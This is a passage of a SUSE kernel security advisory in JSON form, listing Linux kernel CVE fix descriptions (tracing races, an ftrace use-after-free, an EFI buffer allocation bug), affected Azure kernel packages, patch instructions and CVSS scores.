00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39836"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi: stmm: Fix incorrect buffer allocation method\n\nThe communication buffer allocated by setup_mm_hdr() is later on passed\nto tee_shm_register_kernel_buf(). The latter expects those buffers to be\ncontiguous pages, but setup_mm_hdr() just uses kmalloc(). That can cause\nvarious corruptions or BUGs, specifically since commit 9aec2fb0fd5e\n(\"slab: allocate frozen pages\"), though it was broken before as well.\n\nFix this by using alloc_pages_exact() instead of kmalloc().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39836",
"url": "https://www.suse.com/security/cve/CVE-2025-39836"
},
{
"category": "external",
"summary": "SUSE Bug 1249904 for CVE-2025-39836",
"url": "https://bugzilla.suse.com/1249904"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-39836"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
